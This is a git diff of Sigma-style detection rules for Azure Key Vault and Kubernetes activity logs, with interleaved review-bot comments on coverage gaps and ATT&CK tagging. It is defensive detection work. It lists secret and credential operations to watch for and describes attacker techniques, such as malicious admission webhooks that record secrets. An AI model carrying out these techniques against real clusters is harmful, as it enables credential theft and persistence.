@@ -22,13 +28,8 @@ detection:
 - MICROSOFT.KEYVAULT/VAULTS/KEYS/BACKUP/ACTION
 - MICROSOFT.KEYVAULT/VAULTS/KEYS/PURGE/ACTION
 condition: selection
-level: medium
-tags:
- - attack.impact
- - attack.credential_access
- - attack.t1552
- - attack.t1552.001
 falsepositives:
- - Key being modified or deleted may be performed by a system administrator.
- - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- - Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+ - Key being modified or deleted may be performed by a system administrator.
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+level: medium
diff --git a/src/main/resources/rules/azure/azure_keyvault_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_keyvault_modified_or_deleted.yml
index d63cfe24d..9d6b31f4b 100644
--- a/src/main/resources/rules/azure/azure_keyvault_modified_or_deleted.yml
+++ b/src/main/resources/rules/azure/azure_keyvault_modified_or_deleted.yml
@@ -1,29 +1,30 @@
 title: Azure Key Vault Modified or Deleted
 id: 459a2970-bb84-4e6a-a32e-ff0fbd99448d
+status: test
 description: Identifies when a key vault is modified or deleted.
-author: Austin Songer @austinsonger
-status: experimental
-date: 2021/08/16
 references:
 - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+author: Austin Songer @austinsonger
+date: 2021/08/16
+modified: 2022/08/23
+tags:
+ - attack.impact
+ - attack.credential_access
+ - attack.t1552
+ - attack.t1552.001
 logsource:
- product: azure
- service: activitylogs
+ product: azure
+ service: activitylogs
 detection:
 selection:
- properties.message:
+ operationName:
 - MICROSOFT.KEYVAULT/VAULTS/WRITE
 - MICROSOFT.KEYVAULT/VAULTS/DELETE
 - MICROSOFT.KEYVAULT/VAULTS/DEPLOY/ACTION
 - MICROSOFT.KEYVAULT/VAULTS/ACCESSPOLICIES/WRITE
 condition: selection
-level: medium
-tags:
- - attack.impact
- - attack.credential_access
- - attack.t1552
- - attack.t1552.001
 falsepositives:
- - Key Vault being modified or deleted may be performed by a system administrator.
- - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- - Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+ - Key Vault being modified or deleted may be performed by a system administrator.
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+level: medium
diff --git a/src/main/resources/rules/azure/azure_keyvault_secrets_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_keyvault_secrets_modified_or_deleted.yml
index b31895d4a..a97b431d7 100644
--- a/src/main/resources/rules/azure/azure_keyvault_secrets_modified_or_deleted.yml
+++ b/src/main/resources/rules/azure/azure_keyvault_secrets_modified_or_deleted.yml
@@ -1,17 +1,23 @@
 title: Azure Keyvault Secrets Modified or Deleted
 id: b831353c-1971-477b-abb6-2828edc3bca1
+status: test
 description: Identifies when secrets are modified or deleted in Azure.
-author: Austin Songer @austinsonger
-status: experimental
-date: 2021/08/16
 references:
 - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+author: Austin Songer @austinsonger
+date: 2021/08/16
+modified: 2022/08/23
+tags:
+ - attack.impact
+ - attack.credential_access
+ - attack.t1552
+ - attack.t1552.001
 logsource:
- product: azure
- service: activitylogs
+ product: azure
+ service: activitylogs
 detection:
 selection:
- properties.message:
+ operationName:
 - MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE
 - MICROSOFT.KEYVAULT/VAULTS/SECRETS/DELETE
 - MICROSOFT.KEYVAULT/VAULTS/SECRETS/BACKUP/ACTION
@@ -21,13 +27,8 @@ detection:
 - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RESTORE/ACTION
 - MICROSOFT.KEYVAULT/VAULTS/SECRETS/SETSECRET/ACTION
 condition: selection
-level: medium
-tags:
- - attack.impact
- - attack.credential_access
- - attack.t1552
- - attack.t1552.001
 falsepositives:
- - Secrets being modified or deleted may be performed by a system administrator.
- - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+ - Secrets being modified or deleted may be performed by a system administrator.
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+level: medium
diff --git a/src/main/resources/rules/azure/azure_kubernetes_admission_controller.yml b/src/main/resources/rules/azure/azure_kubernetes_admission_controller.yml
index d8f36f7b2..62467b426 100644
--- a/src/main/resources/rules/azure/azure_kubernetes_admission_controller.yml
+++ b/src/main/resources/rules/azure/azure_kubernetes_admission_controller.yml
@@ -1,34 +1,38 @@
 title: Azure Kubernetes Admission Controller
 id: a61a3c56-4ce2-4351-a079-88ae4cbd2b58
-description: Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
-author: Austin Songer @austinsonger
-status: experimental
-date: 2021/11/25
-modified: 2021/11/26
+status: test
+description: |
+ Identifies when an admission controller is executed in Azure Kubernetes.
+ A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.
+ The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.
+ An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.
+ For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.
+ An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.
+ An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
references:
 - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
-logsource:
- product: azure
- service: activitylogs
-detection:
- selection1:
- properties.message|startswith: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO
- properties.message|endswith:
- - /MUTATINGWEBHOOKCONFIGURATIONS/WRITE
- - /VALIDATINGWEBHOOKCONFIGURATIONS/WRITE
- selection2:
- properties.message|startswith: MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO
- properties.message|endswith:
- - /MUTATINGWEBHOOKCONFIGURATIONS/WRITE
- - /VALIDATINGWEBHOOKCONFIGURATIONS/WRITE
- condition: selection1 or selection2
-level: medium
+author: Austin Songer @austinsonger
+date: 2021/11/25
+modified: 2022/12/18
 tags:
 - attack.persistence
 - attack.t1078
 - attack.credential_access
 - attack.t1552
 - attack.t1552.007
+logsource:
+ product: azure
+ service: activitylogs
+detection:
+ selection:
+ operationName|startswith:
+ - 'MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO'
+ - 'MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO'
+ operationName|endswith:
+ - '/MUTATINGWEBHOOKCONFIGURATIONS/WRITE'
+ - '/VALIDATINGWEBHOOKCONFIGURATIONS/WRITE'
+ condition: selection
 falsepositives:
-- Azure Kubernetes Admissions Controller may be done by a system administrator.
-- If known behavior is causing false positives, it can be exempted from the rule.
+ - Azure Kubernetes Admissions Controller may be done by a system administrator.
+ - If known behavior is causing false positives, it can be exempted from the rule.
+level: medium
diff --git a/src/main/resources/rules/azure/azure_kubernetes_cluster_created_or_deleted.yml b/src/main/resources/rules/azure/azure_kubernetes_cluster_created_or_deleted.yml
index d9be4f586..60f6459f8 100644
--- a/src/main/resources/rules/azure/azure_kubernetes_cluster_created_or_deleted.yml
+++ b/src/main/resources/rules/azure/azure_kubernetes_cluster_created_or_deleted.yml 
@@ -1,27 +1,28 @@
 title: Azure Kubernetes Cluster Created or Deleted
 id: 9541f321-7cba-4b43-80fc-fbd1fb922808
+status: test
 description: Detects when a Azure Kubernetes Cluster is created or deleted.
-author: Austin Songer @austinsonger
-status: experimental
-date: 2021/08/07
 references:
 - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
 - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/
 - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
 - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1
 - https://attack.mitre.org/matrices/enterprise/cloud/
+author: Austin Songer @austinsonger
+date: 2021/08/07
+modified: 2022/08/23
+tags:
+ - attack.impact
 logsource:
- product: azure
- service: activitylogs
+ product: azure
+ service: activitylogs
 detection:
 selection:
- properties.message:
+ operationName:
 - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/WRITE
 - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/DELETE
 condition: selection
-level: low
-tags:
- - attack.impact
 falsepositives:
- - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- - Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+ - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+level: low
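Review bot: The selection under `operationName:` covers only Arc-connected clusters (`MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/WRITE` and `/DELETE`), while the title and description speak of any Azure Kubernetes cluster; the admission-controller and CronJob rules touched in this same commit match both that prefix and `MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/`, so AKS cluster creation and deletion appears to fall through this rule. Suggest adding `- MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/WRITE` and `- MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/DELETE` to the list, or narrowing the title and description to Arc-connected clusters if the omission is intentional. The exact AKS operation names are worth confirming against the resource-provider-operations reference the rule already cites.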
diff --git a/src/main/resources/rules/azure/azure_kubernetes_cronjob.yml b/src/main/resources/rules/azure/azure_kubernetes_cronjob.yml
index 146f196aa..b038d3f08 100644
--- a/src/main/resources/rules/azure/azure_kubernetes_cronjob.yml
+++ b/src/main/resources/rules/azure/azure_kubernetes_cronjob.yml
@@ -1,34 +1,36 @@ title: Azure Kubernetes CronJob id: 1c71e254-6655-42c1-b2d6-5e4718d7fc0a -description: Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. -author: Austin Songer @austinsonger -status: experimental -date: 2021/11/22 +status: test +description: | + Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. + Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. + An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. 
references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ - https://kubernetes.io/docs/concepts/workloads/controllers/job/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ -logsource: - product: azure - service: activitylogs -detection: - selection1: - properties.message|startswith: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/BATCH - properties.message|endswith: - - /CRONJOBS/WRITE - - /JOBS/WRITE - selection2: - properties.message|startswith: MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/BATCH - properties.message|endswith: - - /CRONJOBS/WRITE - - /JOBS/WRITE - condition: selection1 or selection2 -level: medium +author: Austin Songer @austinsonger +date: 2021/11/22 +modified: 2022/12/18 tags: - attack.persistence + - attack.t1053.003 - attack.privilege_escalation - attack.execution +logsource: + product: azure + service: activitylogs +detection: + selection: + operationName|startswith: + - 'MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/BATCH' + - 'MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/BATCH' + operationName|endswith: + - '/CRONJOBS/WRITE' + - '/JOBS/WRITE' + condition: selection falsepositives: - Azure Kubernetes CronJob/Job may be done by a system administrator. - If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_events_deleted.yml b/src/main/resources/rules/azure/azure_kubernetes_events_deleted.yml index 9252c26fb..577db6d43 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_events_deleted.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_events_deleted.yml 
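Review bot: The description in the new block says the rule identifies when a CronJob "runs", but the selection matches `/CRONJOBS/WRITE` and `/JOBS/WRITE`, i.e. the creation or update of a CronJob or plain Job object through the Azure control plane, not a scheduled execution, and a plain Job is not a CronJob. Suggest rewording the first sentence to `Identifies when a Kubernetes CronJob or Job object is created or modified in an Azure Arc-connected or AKS managed cluster.` so analysts do not expect one alert per run. The merged selection is otherwise equivalent to the old selection1/selection2 pair, since the two fields are ANDed and each value list is ORed.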
@@ -1,23 +1,24 @@ title: Azure Kubernetes Events Deleted id: 225d8b09-e714-479c-a0e4-55e6f29adf35 +status: test description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml -logsource: - product: azure - service: activitylogs -detection: - selection_operation_name: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE - condition: selection_operation_name -level: medium +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/08/23 tags: - attack.defense_evasion - attack.t1562 - attack.t1562.001 +logsource: + product: azure + service: activitylogs +detection: + selection: + operationName: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE + condition: selection falsepositives: -- Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium 
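Review bot: The selection matches only `MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE`, so event deletion in an AKS managed cluster (the `MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS` operations used elsewhere in this patch) and, if the provider lists one, a core-group `.../CONNECTEDCLUSTERS/EVENTS/DELETE` operation would not be flagged; for a defense-evasion rule that gap is worth closing or at least stating in the description. Consider `operationName|endswith: '/EVENTS/DELETE'` combined with the two provider prefixes via `operationName|startswith`, after confirming the names in the linked operations reference.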
diff --git a/src/main/resources/rules/azure/azure_kubernetes_network_policy_change.yml b/src/main/resources/rules/azure/azure_kubernetes_network_policy_change.yml
index 71b65a4f2..30525dc4c 100644
--- a/src/main/resources/rules/azure/azure_kubernetes_network_policy_change.yml
+++ b/src/main/resources/rules/azure/azure_kubernetes_network_policy_change.yml
@@ -1,30 +1,31 @@ title: Azure Kubernetes Network Policy Change id: 08d6ac24-c927-4469-b3b7-2e422d6e3c43 +status: test description: Identifies when a Azure Kubernetes network policy is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact + - attack.credential_access logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE condition: selection -level: medium -tags: - - attack.impact - - attack.credential_access falsepositives: - - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Network Policy being modified and deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_pods_deleted.yml b/src/main/resources/rules/azure/azure_kubernetes_pods_deleted.yml index ac7d0e1df..4b97b1b0f 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_pods_deleted.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_pods_deleted.yml 
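Review bot: The tags moved into the new block keep `attack.credential_access`, which does not describe modifying or deleting a NetworkPolicy; nothing in the selection reads or exposes credentials. The firewall-policy rule later in this patch tags the equivalent action as `attack.defense_evasion` with `attack.t1562.007`, so replacing `- attack.credential_access` with `- attack.defense_evasion` and `- attack.t1562.007` would be both more accurate and consistent across the Azure rules. As with the other Kubernetes rules here, only `MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS` (Arc) operations are matched, which the description should say.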
@@ -1,22 +1,23 @@ title: Azure Kubernetes Pods Deleted id: b02f9591-12c3-4965-986a-88028629b2e1 +status: test description: Identifies the deletion of Azure Kubernetes Pods. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml -logsource: - product: azure - service: activitylogs -detection: - selection_operation_name: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE - condition: selection_operation_name -level: medium +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/08/23 tags: - attack.impact +logsource: + product: azure + service: activitylogs +detection: + selection: + operationName: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE + condition: selection falsepositives: -- Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. -- Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_role_access.yml b/src/main/resources/rules/azure/azure_kubernetes_role_access.yml index a3c9bf010..ab21c690d 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_role_access.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_role_access.yml 
@@ -1,21 +1,24 @@ title: Azure Kubernetes Sensitive Role Access id: 818fee0c-e0ec-4e45-824e-83e4817b0887 +status: test description: Identifies when ClusterRoles/Roles are being modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/BIND/ACTION 
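Review bot: The tags block added here carries only `attack.impact`, but the selection includes `ROLES/BIND/ACTION` (and, in the following hunk, `CLUSTERROLES/BIND/ACTION` and `CLUSTERROLES/ESCALATE/ACTION`), which are the RBAC verbs an attacker needs to grant rights they do not already hold; that is privilege escalation, not impact. Add `- attack.privilege_escalation` alongside `- attack.impact`, and consider a higher `level` for the bind/escalate actions than for plain role writes. The selection list continues in the next hunk and the three list entries between the two hunks are not shown.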
@@ -25,9 +28,7 @@ detection: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/BIND/ACTION - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/ESCALATE/ACTION condition: selection -level: medium -tags: - - attack.impact falsepositives: - - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml index efea094a1..26e5f3a78 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml 
@@ -1,30 +1,31 @@ title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted id: 25cb259b-bbdc-4b87-98b7-90d7c72f8743 +status: test description: Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact + - attack.credential_access logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/DELETE condition: selection -level: medium -tags: - - attack.impact - - attack.credential_access falsepositives: - - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
+ - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_secret_or_config_object_access.yml b/src/main/resources/rules/azure/azure_kubernetes_secret_or_config_object_access.yml index f809df396..104cb0a32 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_secret_or_config_object_access.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_secret_or_config_object_access.yml 
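Review bot: `attack.credential_access` is kept in the relocated tags although creating, changing or deleting a RoleBinding/ClusterRoleBinding neither reads nor exposes credentials; binding a subject to a privileged role is `attack.privilege_escalation` (and, for a binding left in place, `attack.persistence`). Replace `- attack.credential_access` accordingly. The description also says only "creation or patching", while the selection includes the two `/DELETE` operations the title promises, so the description should mention deletion too.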
@@ -1,28 +1,29 @@ title: Azure Kubernetes Secret or Config Object Access id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c +status: test description: Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_service_account_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_kubernetes_service_account_modified_or_deleted.yml index 355e7bd31..16c04cc67 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_service_account_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_service_account_modified_or_deleted.yml 
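Review bot: The title and description speak of "access" to secrets and configmaps, but the `operationName` list contains only `/SECRETS/WRITE`, `/SECRETS/DELETE`, `/CONFIGMAPS/WRITE` and `/CONFIGMAPS/DELETE`, so reading a secret, the operation that matters for credential theft, is never matched. If the provider emits a read operation into the activity log (the linked operations reference would list something like `MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/READ`; read operations are often not recorded there, which should be checked), adding it or splitting reads into a separate `attack.credential_access`-tagged rule would make the rule match its name; otherwise the title and description should be narrowed to "modified or deleted". The `attack.impact` tag fits only the write/delete cases, and, as elsewhere in this patch, only Arc-connected clusters are covered.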
